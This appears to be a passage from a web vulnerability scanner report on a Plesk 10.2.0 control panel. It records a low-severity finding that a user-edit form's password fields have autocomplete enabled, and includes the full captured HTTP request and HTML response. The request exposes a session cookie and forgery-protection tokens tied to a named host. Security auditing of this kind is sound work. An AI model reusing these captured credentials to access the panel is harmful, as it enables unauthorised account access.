<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

6.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/3

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/3

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /smb/user/edit/id/3 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/list
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:51:20 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:51:20 GMT
Connection: close
Content-Length: 45474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>format-1 - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fedit%2Fid%2F3' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span><b>format-1</b></span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>
<div id='general-vcard-contactName-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="general[vcard][contactName]" id="general-vcard-contactName" value="format-1" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address which is also used as a username for logging in to the Panel&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="format-1" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="format-1@vulnerable.host.fqdn" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId">
<option value="5" label="Owner">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User" selected="selected">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-loginString'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-loginString'>format-1@vulnerable.host.fqdn</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="Åland Islands">Åland Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
